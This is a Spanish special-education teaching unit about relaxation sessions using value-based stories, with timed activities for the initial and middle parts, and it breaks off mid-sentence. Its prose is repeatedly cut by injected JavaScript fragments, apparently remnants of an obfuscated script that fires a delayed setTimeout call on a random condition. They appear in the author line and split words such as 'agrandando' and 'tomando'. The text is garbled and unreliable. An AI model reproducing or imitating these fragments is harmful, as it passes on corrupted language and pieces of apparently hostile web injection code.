UNIDAD DIDÁCTICA PARA EDUCACIÓN ESPECIAL

Autora: Ana Belén Nieves Hernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando

          Es una Unidad Didáctica dirigida al alumnado de Educación Especial con el objetivo y finalidad de conseguir la relajación y tranquilidad mediante cuentos educativos en valores, donde den uso a su imaginación. La Unidad  Didáctica está dividida en tres partes importantes: “parte inicial”, donde se introducirá la actividad; “parte media”, donde se presentará el cuento didáctico; y “parte final”, donde concluirá la sesión”.

Parte Inicial

1.- Explicación de la sesión, y de algunas normas básicas (comportamiento, sistemas de señales para no alterar la tranquilidad…). (3′)

2.- Tumbados boca arriba, imaginarnos un punto luminoso, que iremos agrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando hasta que, poco a poco, cubra todo el cuerpo. Después, dicho punto debe recorrer todo el cuerpo e irá desapareciendo, progresivamente, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando señale el profesor. (5′)

3.- Individualmente, y con una pelota, iremos recorriendo nuestro cuerpo, por donde el niño quiera. El único requisito es que no levante la pelota del cuerpo. (4′)


  

 Parte Media

1.- Los alumnos, tumbados en el suelo boca arriba, irán tomandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando conciencia y relajandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}